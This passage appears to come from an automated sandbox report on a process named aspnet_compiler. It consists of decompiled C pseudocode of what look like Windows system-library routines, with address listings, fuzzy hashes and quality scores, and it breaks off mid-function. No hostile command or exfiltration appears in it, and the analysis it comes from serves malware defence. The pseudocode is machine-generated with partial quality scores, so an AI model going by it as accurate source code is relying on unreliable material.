                                                  0x018c4a4b
                                                  0x018c4a4d
                                                  0x018c4a51
                                                  0x018c4a9c
                                                  0x00000000
                                                  0x00000000
                                                  0x018c4aa3
                                                  0x018c4aa8
                                                  0x018c4aad
                                                  0x018c4ab1
                                                  0x018c4ade
                                                  0x018c4ae3
                                                  0x018c4a5a
                                                  0x018c4a62
                                                  0x018c4a6a
                                                  0x018c4a6e
                                                  0x018ff203
                                                  0x018c4a84
                                                  0x018c4a88
                                                  0x018c4a89
                                                  0x018c4a8a
                                                  0x018c4a95
                                                  0x018c4a95
                                                  0x018c4a79
                                                  0x018c4a80
                                                  0x018c4af2
                                                  0x018c4af4
                                                  0x018c4af9
                                                  0x018c4aff
                                                  0x018c4b01
                                                  0x018c4b03
                                                  0x018c4b08
                                                  0x018ff20a
                                                  0x018ff212
                                                  0x018ff216
                                                  0x018ff216
                                                  0x018c4b08
                                                  0x018c4b13
                                                  0x018c4b1a
                                                  0x018ff229
                                                  0x018ff229
                                                  0x018c4b1a
                                                  0x018c4a82
                                                  0x00000000
                                                  0x018c4a82
                                                  0x018c4ab7
                                                  0x018c4acd
                                                  0x018c4acd
                                                  0x018c4ad5
                                                  0x018c4ada
                                                  0x00000000
                                                  0x018c4ada
                                                  0x018c4ac2
                                                  0x018c4acb
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x018c4acb
                                                  0x018c4a53
                                                  0x018c4a53
                                                  0x018c4a58
                                                  0x00000000

                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1ba4365e70227c5c7d327490259fd83fc3a04afd5cd54c74657eacdcb2488ddf
                                                  • Instruction ID: a63ab86ce1a42ec832a0e9dfe826c27ab62b263b1ef685a89f417675fc91886b
                                                  • Opcode Fuzzy Hash: 1ba4365e70227c5c7d327490259fd83fc3a04afd5cd54c74657eacdcb2488ddf
                                                  • Instruction Fuzzy Hash: C3310032205615ABD7229F5DC984B2ABBA5FFC0F14F04042DEA5ACB641CB70DA80CB86
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 018B1DB5 Relevance: .1, Instructions: 87COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 60%
                                                  			E018B1DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				void* _t22;
				char _t23;
				void* _t36;
				intOrPtr _t42;
				intOrPtr _t43;

				_v12 = __ecx;
				_t43 = 0;
				_v20 = __edx;
				_t42 =  *__edx;
				 *__edx = 0;
				_v16 = _t42;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(6);
				_push(0);
				_push(__ecx);
				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
				_push(_t36);
				_t22 = L018AF460();
				if(_t22 < 0) {
					if(_t22 == 0xc0000023) {
						goto L1;
					}
					L3:
					return _t43;
				}
				L1:
				_t23 = _v8;
				if(_t23 != 0) {
					_t38 = _a4;
					if(_t23 >  *_a4) {
						_t42 = L018A4620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
						if(_t42 == 0) {
							goto L3;
						}
						_t23 = _v8;
					}
					_push( &_v8);
					_push(_t23);
					_push(_t42);
					_push(6);
					_push(_t43);
					_push(_v12);
					_push(_t36);
					if(L018AF460() < 0) {
						if(_t42 != 0 && _t42 != _v16) {
							L018A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
						}
						goto L3;
					}
					 *_v20 = _t42;
					 *_a4 = _v8;
				}
				_t43 = 1;
				goto L3;
			}












                                                  0x018b1dc2
                                                  0x018b1dc5
                                                  0x018b1dc7
                                                  0x018b1dcc
                                                  0x018b1dce
                                                  0x018b1dd6
                                                  0x018b1ddf
                                                  0x018b1de0
                                                  0x018b1de1
                                                  0x018b1de5
                                                  0x018b1de8
                                                  0x018b1def
                                                  0x018b1df0
                                                  0x018b1df6
                                                  0x018b1df7
                                                  0x018b1dfe
                                                  0x018b1e1a
                                                  0x00000000
                                                  0x00000000
                                                  0x018b1e0b
                                                  0x018b1e12
                                                  0x018b1e12
                                                  0x018b1e00
                                                  0x018b1e00
                                                  0x018b1e05
                                                  0x018b1e1e
                                                  0x018b1e23
                                                  0x018f570f
                                                  0x018f5713
                                                  0x00000000
                                                  0x00000000
                                                  0x018f5719
                                                  0x018f5719
                                                  0x018b1e2c
                                                  0x018b1e2d
                                                  0x018b1e2e
                                                  0x018b1e2f
                                                  0x018b1e31
                                                  0x018b1e32
                                                  0x018b1e35
                                                  0x018b1e3d
                                                  0x018f5723
                                                  0x018f573d
                                                  0x018f573d
                                                  0x00000000
                                                  0x018f5723
                                                  0x018b1e49
                                                  0x018b1e4e
                                                  0x018b1e4e
                                                  0x018b1e09
                                                  0x00000000

                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                                  • Instruction ID: ccfc25995c74d515f77d232c952d9aa400b664964528252ab16e347b82175165
                                                  • Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                                  • Instruction Fuzzy Hash: E6219F32600119EBD721CF59DC99EABBBB9EF85B44F114055EA01DB320D634AF01CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 01889100 Relevance: .1, Instructions: 87COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 76%
                                                  			E01889100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
				signed int _t53;
				signed int _t56;
				signed int* _t60;
				signed int _t63;
				signed int _t66;
				signed int _t69;
				void* _t70;
				intOrPtr* _t72;
				void* _t78;
				void* _t79;
				signed int _t80;
				intOrPtr _t82;
				void* _t85;
				void* _t88;
				void* _t89;

				_t84 = __esi;
				_t70 = __ecx;
				_t68 = __ebx;
				_push(0x2c);
				_push(0x195f6e8);
				E018DD0E8(__ebx, __edi, __esi);
				 *((char*)(_t85 - 0x1d)) = 0;
				_t82 =  *((intOrPtr*)(_t85 + 8));
				if(_t82 == 0) {
					L4:
					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
						E019588F5(_t68, _t70, _t78, _t82, _t84, __eflags);
					}
					L5:
					return E018DD130(_t68, _t82, _t84);
				}
				_t88 = _t82 -  *0x19786c0; // 0x14207b0
				if(_t88 == 0) {
					goto L4;
				}
				_t89 = _t82 -  *0x19786b8; // 0x0
				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L4;
				} else {
					E018A2280(_t82 + 0xe0, _t82 + 0xe0);
					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
					__eflags =  *((char*)(_t82 + 0xe5));
					if(__eflags != 0) {
						E019588F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
						goto L12;
					} else {
						__eflags =  *((char*)(_t82 + 0xe4));
						if( *((char*)(_t82 + 0xe4)) == 0) {
							 *((char*)(_t82 + 0xe4)) = 1;
							_push(_t82);
							_push( *((intOrPtr*)(_t82 + 0x24)));
							L018CAFD0();
						}
						while(1) {
							_t60 = _t82 + 8;
							 *(_t85 - 0x2c) = _t60;
							_t68 =  *_t60;
							_t80 = _t60[1];
							 *(_t85 - 0x28) = _t68;
							 *(_t85 - 0x24) = _t80;
							while(1) {
								L10:
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t84 = _t68;
								 *(_t85 - 0x30) = _t80;
								 *(_t85 - 0x24) = _t80 - 1;
								asm("lock cmpxchg8b [edi]");
								_t68 = _t84;
								 *(_t85 - 0x28) = _t68;
								 *(_t85 - 0x24) = _t80;
								__eflags = _t68 - _t84;
								_t82 =  *((intOrPtr*)(_t85 + 8));
								if(_t68 != _t84) {
									continue;
								}
								__eflags = _t80 -  *(_t85 - 0x30);
								if(_t80 !=  *(_t85 - 0x30)) {
									continue;
								}
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t63 = 0;
								 *(_t85 - 0x34) = 0;
								_t84 = 0;
								__eflags = 0;
								while(1) {
									 *(_t85 - 0x3c) = _t84;
									__eflags = _t84 - 3;
									if(_t84 >= 3) {
										break;
									}
									__eflags = _t63;
									if(_t63 != 0) {
										L40:
										_t84 =  *_t63;
										__eflags = _t84;
										if(_t84 != 0) {
											_t84 =  *(_t84 + 4);
											__eflags = _t84;
											if(_t84 != 0) {
												 *0x197b1e0(_t63, _t82);
												 *_t84();
											}
										}
										do {
											_t60 = _t82 + 8;
											 *(_t85 - 0x2c) = _t60;
											_t68 =  *_t60;
											_t80 = _t60[1];
											 *(_t85 - 0x28) = _t68;
											 *(_t85 - 0x24) = _t80;
											goto L10;
										} while (_t63 == 0);
										goto L40;
									}
									_t69 = 0;
									__eflags = 0;
									while(1) {
										 *(_t85 - 0x38) = _t69;
										__eflags = _t69 -  *0x19784c0;
										if(_t69 >=  *0x19784c0) {
											break;
										}
										__eflags = _t63;
										if(_t63 != 0) {
											break;
										}
										_t66 = E01959063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
										__eflags = _t66;
										if(_t66 == 0) {
											_t63 = 0;
											__eflags = 0;
										} else {
											_t63 = _t66 + 0xfffffff4;
										}
										 *(_t85 - 0x34) = _t63;
										_t69 = _t69 + 1;
									}
									_t84 = _t84 + 1;
								}
								__eflags = _t63;
							}
							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
							 *((char*)(_t82 + 0xe5)) = 1;
							 *((char*)(_t85 - 0x1d)) = 1;
							L12:
							 *(_t85 - 4) = 0xfffffffe;
							E0188922A(_t82);
							_t53 = L018A7D50();
							__eflags = _t53;
							if(_t53 != 0) {
								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
							} else {
								_t56 = 0x7ffe0386;
							}
							__eflags =  *_t56;
							if( *_t56 != 0) {
								_t56 = E01958B58(_t82);
							}
							__eflags =  *((char*)(_t85 - 0x1d));
							if( *((char*)(_t85 - 0x1d)) != 0) {
								__eflags = _t82 -  *0x19786c0; // 0x14207b0
								if(__eflags != 0) {
									__eflags = _t82 -  *0x19786b8; // 0x0
									if(__eflags == 0) {
										_t79 = 0x19786bc;
										_t72 = 0x19786b8;
										goto L18;
									}
									__eflags = _t56 | 0xffffffff;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										E01889240(_t68, _t82, _t82, _t84, __eflags);
									}
								} else {
									_t79 = 0x19786c4;
									_t72 = 0x19786c0;
									L18:
									E018B9B82(_t68, _t72, _t79, _t82, _t84, __eflags);
								}
							}
							goto L5;
						}
					}
				}
			}


















                                                  0x01889100
                                                  0x01889100
                                                  0x01889100
                                                  0x01889100
                                                  0x01889102
                                                  0x01889107
                                                  0x0188910c
                                                  0x01889110
                                                  0x01889115
                                                  0x01889136
                                                  0x01889143
                                                  0x018e37e4
                                                  0x018e37e4
                                                  0x01889149
                                                  0x0188914e
                                                  0x0188914e
                                                  0x01889117
                                                  0x0188911d
                                                  0x00000000
                                                  0x00000000
                                                  0x0188911f
                                                  0x01889125
                                                  0x00000000
                                                  0x01889151
                                                  0x01889158
                                                  0x0188915d
                                                  0x01889161
                                                  0x01889168
                                                  0x018e3715
                                                  0x00000000
                                                  0x0188916e
                                                  0x0188916e
                                                  0x01889175
                                                  0x01889177
                                                  0x0188917e
                                                  0x0188917f
                                                  0x01889182
                                                  0x01889182
                                                  0x01889187
                                                  0x01889187
                                                  0x0188918a
                                                  0x0188918d
                                                  0x0188918f
                                                  0x01889192
                                                  0x01889195
                                                  0x01889198
                                                  0x01889198
                                                  0x01889198
                                                  0x0188919a
                                                  0x00000000
                                                  0x00000000
                                                  0x018e371f
                                                  0x018e3721
                                                  0x018e3727
                                                  0x018e372f
                                                  0x018e3733
                                                  0x018e3735
                                                  0x018e3738
                                                  0x018e373b
                                                  0x018e373d
                                                  0x018e3740
                                                  0x00000000
                                                  0x00000000
                                                  0x018e3746
                                                  0x018e3749
                                                  0x00000000
                                                  0x00000000
                                                  0x018e374f
                                                  0x018e3751
                                                  0x00000000
                                                  0x00000000
                                                  0x018e3757
                                                  0x018e3759
                                                  0x018e375c
                                                  0x018e375c
                                                  0x018e375e
                                                  0x018e375e
                                                  0x018e3761
                                                  0x018e3764
                                                  0x00000000
                                                  0x00000000
                                                  0x018e3766
                                                  0x018e3768
                                                  0x018e37a3
                                                  0x018e37a3
                                                  0x018e37a5
                                                  0x018e37a7
                                                  0x018e37ad
                                                  0x018e37b0
                                                  0x018e37b2
                                                  0x018e37bc
                                                  0x018e37c2
                                                  0x018e37c2
                                                  0x018e37b2
                                                  0x01889187
                                                  0x01889187
                                                  0x0188918a
                                                  0x0188918d
                                                  0x0188918f
                                                  0x01889192
                                                  0x01889195
                                                  0x00000000
                                                  0x01889195
                                                  0x00000000
                                                  0x01889187
                                                  0x018e376a
                                                  0x018e376a
                                                  0x018e376c
                                                  0x018e376c
                                                  0x018e376f
                                                  0x018e3775
                                                  0x00000000
                                                  0x00000000
                                                  0x018e3777
                                                  0x018e3779
                                                  0x00000000
                                                  0x00000000
                                                  0x018e3782
                                                  0x018e3787
                                                  0x018e3789
                                                  0x018e3790
                                                  0x018e3790
                                                  0x018e378b
                                                  0x018e378b
                                                  0x018e378b
                                                  0x018e3792
                                                  0x018e3795
                                                  0x018e3795
                                                  0x018e3798
                                                  0x018e3798
                                                  0x018e379b
                                                  0x018e379b
                                                  0x018891a3
                                                  0x018891a9
                                                  0x018891b0
                                                  0x018891b4
                                                  0x018891b4
                                                  0x018891bb
                                                  0x018891c0
                                                  0x018891c5
                                                  0x018891c7
                                                  0x018e37da
                                                  0x018891cd
                                                  0x018891cd
                                                  0x018891cd
                                                  0x018891d2
                                                  0x018891d5
                                                  0x01889239
                                                  0x01889239
                                                  0x018891d7
                                                  0x018891db
                                                  0x018891e1
                                                  0x018891e7
                                                  0x018891fd
                                                  0x01889203
                                                  0x0188921e
                                                  0x01889223
                                                  0x00000000
                                                  0x01889223
                                                  0x01889205
                                                  0x01889208
                                                  0x0188920c
                                                  0x01889214
                                                  0x01889214
                                                  0x018891e9
                                                  0x018891e9
                                                  0x018891ee
                                                  0x018891f3
                                                  0x018891f3
                                                  0x018891f3
                                                  0x018891e7
                                                  0x00000000
                                                  0x018891db
                                                  0x01889187
                                                  0x01889168

                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bf15e238373eea70ba66a220549b2fd14fb305b92b1386ddab7166795018c0eb
                                                  • Instruction ID: c4c3b67e61cf89c0344e52fe7bf04844452a28591ac28dd48224b0a90c164abe
                                                  • Opcode Fuzzy Hash: bf15e238373eea70ba66a220549b2fd14fb305b92b1386ddab7166795018c0eb
                                                  • Instruction Fuzzy Hash: 33318379E09A45DFDB21EB6CC4887ACBBF1BF85318F14815DC518E7241D339AA80C752
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 018A0050 Relevance: .1, Instructions: 81COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 53%
                                                  			E018A0050(void* __ecx) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t30;
				intOrPtr* _t31;
				signed int _t34;
				void* _t40;
				void* _t41;
				signed int _t44;
				intOrPtr _t47;
				signed int _t58;
				void* _t59;
				void* _t61;
				void* _t62;
				signed int _t64;

				_push(__ecx);
				_v8 =  *0x197d360 ^ _t64;
				_t61 = __ecx;
				_t2 = _t61 + 0x20; // 0x20
				L018B9ED0(_t2, 1, 0);
				_t52 =  *(_t61 + 0x8c);
				_t4 = _t61 + 0x8c; // 0x8c
				_t40 = _t4;
				do {
					_t44 = _t52;
					_t58 = _t52 & 0x00000001;
					_t24 = _t44;
					asm("lock cmpxchg [ebx], edx");
					_t52 = _t44;
				} while (_t52 != _t44);
				if(_t58 == 0) {
					L7:
					_pop(_t59);
					_pop(_t62);
					_pop(_t41);
					return L018CB640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
				}
				asm("lock xadd [esi], eax");
				_t47 =  *[fs:0x18];
				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t30 != 0) {
					if( *_t30 == 0) {
						goto L4;
					}
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					L5:
					if( *_t31 != 0) {
						_t18 = _t61 + 0x78; // 0x78
						E01958A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
					}
					_t52 =  *(_t61 + 0x5c);
					_t11 = _t61 + 0x78; // 0x78
					_t34 = L018B9702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
					_t24 = _t34 | 0xffffffff;
					asm("lock xadd [esi], eax");
					if((_t34 | 0xffffffff) == 0) {
						 *0x197b1e0(_t61);
						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
					}
					goto L7;
				}
				L4:
				_t31 = 0x7ffe0386;
				goto L5;
			}




















                                                  0x018a0055
                                                  0x018a005d
                                                  0x018a0062
                                                  0x018a006c
                                                  0x018a006f
                                                  0x018a0074
                                                  0x018a007a
                                                  0x018a007a
                                                  0x018a0080
                                                  0x018a0080
                                                  0x018a0087
                                                  0x018a008d
                                                  0x018a008f
                                                  0x018a0093
                                                  0x018a0095
                                                  0x018a009b
                                                  0x018a00f8
                                                  0x018a00fb
                                                  0x018a00fc
                                                  0x018a00ff
                                                  0x018a0108
                                                  0x018a0108
                                                  0x018a00a2
                                                  0x018a00a6
                                                  0x018a00b3
                                                  0x018a00bc
                                                  0x018a00c5
                                                  0x018a00ca
                                                  0x018ec01e
                                                  0x00000000
                                                  0x00000000
                                                  0x018ec02d
                                                  0x018a00d5
                                                  0x018a00d9
                                                  0x018ec03d
                                                  0x018ec046
                                                  0x018ec046
                                                  0x018a00df
                                                  0x018a00e2
                                                  0x018a00ea
                                                  0x018a00ef
                                                  0x018a00f2
                                                  0x018a00f6
                                                  0x018a0111
                                                  0x018a0117
                                                  0x018a0117
                                                  0x00000000
                                                  0x018a00f6
                                                  0x018a00d0
                                                  0x018a00d0
                                                  0x00000000

                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d69a778d0d14e6251446b1aab4a42ffcf7f27b599ded41b87160456acc7547b2
                                                  • Instruction ID: b33bfd08dde20082f96dd9ff23884f0f8705138ac3e2d08331d96d3fee17cbef
                                                  • Opcode Fuzzy Hash: d69a778d0d14e6251446b1aab4a42ffcf7f27b599ded41b87160456acc7547b2
                                                  • Instruction Fuzzy Hash: 3B319A31641A08CFE722CF28C844B96B7E5FF89714F14456DE59AC7B90EB75A901CB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 018C90AF Relevance: .1, Instructions: 76COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 82%
                                                  			E018C90AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr* _v0;
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				char _v36;
				void* _t38;
				intOrPtr _t41;
				void* _t44;
				signed int _t45;
				intOrPtr* _t49;
				signed int _t57;
				signed int _t58;
				intOrPtr* _t59;
				void* _t62;
				void* _t63;
				void* _t65;
				void* _t66;
				signed int _t69;
				intOrPtr* _t70;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				char _t74;

				_t65 = __edx;
				_t57 = _a4;
				_t32 = __ecx;
				_v8 = __edx;
				_t3 = _t32 + 0x14c; // 0x14c
				_t70 = _t3;
				_v16 = __ecx;
				_t72 =  *_t70;
				while(_t72 != _t70) {
					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
						L24:
						_t72 =  *_t72;
						continue;
					}
					_t30 = _t72 + 0x10; // 0x10
					if(L018DD4F0(_t30, _t65, _t57) == _t57) {
						return 0xb7;
					}
					_t65 = _v8;
					goto L24;
				}
				_t61 = _t57;
				_push( &_v12);
				_t66 = 0x10;
				if(E018BE5E0(_t57, _t66) < 0) {
					return 0x216;
				}
				_t73 = L018A4620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
				if(_t73 == 0) {
					_t38 = 0xe;
					return _t38;
				}
				_t9 = _t73 + 0x10; // 0x10
				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
				E018CF3E0(_t9, _v8, _t57);
				_t41 =  *_t70;
				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
					_t62 = 3;
					asm("int 0x29");
					_push(_t62);
					_push(_t57);
					_push(_t73);
					_push(_t70);
					_t71 = _t62;
					_t74 = 0;
					_v36 = 0;
					_t63 = E018BA2F0(_t62, _t71, 1, 6,  &_v36);
					if(_t63 == 0) {
						L20:
						_t44 = 0x57;
						return _t44;
					}
					_t45 = _v12;
					_t58 = 0x1c;
					if(_t45 < _t58) {
						goto L20;
					}
					_t69 = _t45 / _t58;
					if(_t69 == 0) {
						L19:
						return 0xe8;
					}
					_t59 = _v0;
					do {
						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
							goto L18;
						}
						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
						 *_t59 = _t49;
						if( *_t49 != 0x53445352) {
							goto L18;
						}
						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
						return 0;
						L18:
						_t63 = _t63 + 0x1c;
						_t74 = _t74 + 1;
					} while (_t74 < _t69);
					goto L19;
				}
				 *_t73 = _t41;
				 *((intOrPtr*)(_t73 + 4)) = _t70;
				 *((intOrPtr*)(_t41 + 4)) = _t73;
				 *_t70 = _t73;
				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
				return 0;
			}


























                                                  0x018c90af
                                                  0x018c90b8
                                                  0x018c90bb
                                                  0x018c90bf
                                                  0x018c90c2
                                                  0x018c90c2
                                                  0x018c90c8
                                                  0x018c90cb
                                                  0x018c90cd
                                                  0x019014d7
                                                  0x019014eb
                                                  0x019014eb
                                                  0x00000000
                                                  0x019014eb
                                                  0x019014db
                                                  0x019014e6
                                                  0x00000000
                                                  0x019014f2
                                                  0x019014e8
                                                  0x00000000
                                                  0x019014e8
                                                  0x018c90d8
                                                  0x018c90da
                                                  0x018c90dd
                                                  0x018c90e5
                                                  0x00000000
                                                  0x018c9139
                                                  0x018c90fa
                                                  0x018c90fe
                                                  0x018c9142
                                                  0x00000000
                                                  0x018c9142
                                                  0x018c9104
                                                  0x018c9107
                                                  0x018c910b
                                                  0x018c9110
                                                  0x018c9118
                                                  0x018c9147
                                                  0x018c9148
                                                  0x018c914f
                                                  0x018c9150
                                                  0x018c9151
                                                  0x018c9152
                                                  0x018c9156
                                                  0x018c915d
                                                  0x018c9160
                                                  0x018c9168
                                                  0x018c916c
                                                  0x018c91bc
                                                  0x018c91be
                                                  0x00000000
                                                  0x018c91be
                                                  0x018c916e
                                                  0x018c9173
                                                  0x018c9176
                                                  0x00000000
                                                  0x00000000
                                                  0x018c917c
                                                  0x018c9180
                                                  0x018c91b5
                                                  0x00000000
                                                  0x018c91b5
                                                  0x018c9182
                                                  0x018c9185
                                                  0x018c9189
                                                  0x00000000
                                                  0x00000000
                                                  0x018c918e
                                                  0x018c9190
                                                  0x018c9198
                                                  0x00000000
                                                  0x00000000
                                                  0x018c91a0
                                                  0x00000000
                                                  0x018c91ad
                                                  0x018c91ad
                                                  0x018c91b0
                                                  0x018c91b1
                                                  0x00000000
                                                  0x018c9185
                                                  0x018c911a
                                                  0x018c911c
                                                  0x018c911f
                                                  0x018c9125
                                                  0x018c9127
                                                  0x00000000

                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                  • Instruction ID: 19adc9630519fb8e642f23c733af5806cf3029b0e2a1142320dd70c653fbb39d
                                                  • Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                  • Instruction Fuzzy Hash: 8C217171A00609EFDB21DF59C445A9ABBF8EB54714F1584AFE949D7250D374EA00CB50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 018B3B7A Relevance: .1, Instructions: 75COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 59%
                                                  			E018B3B7A(void* __ecx) {
				signed int _v8;
				char _v12;
				intOrPtr _v20;
				intOrPtr _t17;
				intOrPtr _t26;
				void* _t35;
				void* _t38;
				void* _t41;
				intOrPtr _t44;

				_t17 =  *0x19784c4; // 0x0
				_v12 = 1;
				_v8 =  *0x19784c0 * 0x4c;
				_t41 = __ecx;
				_t35 = L018A4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x19784c0 * 0x4c);
				if(_t35 == 0) {
					_t44 = 0xc0000017;
				} else {
					_push( &_v8);
					_push(_v8);
					_push(_t35);
					_push(4);
					_push( &_v12);
					_push(0x6b);
					_t44 = E018CAA90();
					_v20 = _t44;
					if(_t44 >= 0) {
						E018CFA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x19784c0 * 0xc);
						_t38 = _t35;
						if(_t35 < _v8 + _t35) {
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
							} while (_t38 < _v8 + _t35);
							_t44 = _v20;
						}
					}
					_t26 =  *0x19784c4; // 0x0
					L018A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
				}
				return _t44;
			}












                                                  0x018b3b89
                                                  0x018b3b96
                                                  0x018b3ba1
                                                  0x018b3bab
                                                  0x018b3bb5
                                                  0x018b3bb9
                                                  0x018f6298
                                                  0x018b3bbf
                                                  0x018b3bc2
                                                  0x018b3bc3
                                                  0x018b3bc9
                                                  0x018b3bca
                                                  0x018b3bcc
                                                  0x018b3bcd
                                                  0x018b3bd4
                                                  0x018b3bd6
                                                  0x018b3bdb
                                                  0x018b3bea
                                                  0x018b3bf7
                                                  0x018b3bfb
                                                  0x018b3bff
                                                  0x018b3c09
                                                  0x018b3c0a
                                                  0x018b3c0b
                                                  0x018b3c0f
                                                  0x018b3c14
                                                  0x018b3c18
                                                  0x018b3c18
                                                  0x018b3bfb
                                                  0x018b3c1b
                                                  0x018b3c30
                                                  0x018b3c30
                                                  0x018b3c3d

                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d597d14b75a3c84c43681d7508cbebe312cabe4370e757489098c7127cca3c87
                                                  • Instruction ID: bbf35973750286be50b33c6f0c54ce9ca7e4e1e5d79d7ee5c8104e5699c56676
                                                  • Opcode Fuzzy Hash: d597d14b75a3c84c43681d7508cbebe312cabe4370e757489098c7127cca3c87
                                                  • Instruction Fuzzy Hash: DF219272A00109AFD715DF98CD85B5ABBBDFF44708F150068EA04EB251D771EE01DB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 018BFD9B Relevance: .1, Instructions: 69COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 93%
                                                  			E018BFD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				intOrPtr _v8;
				void* _t19;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t40;

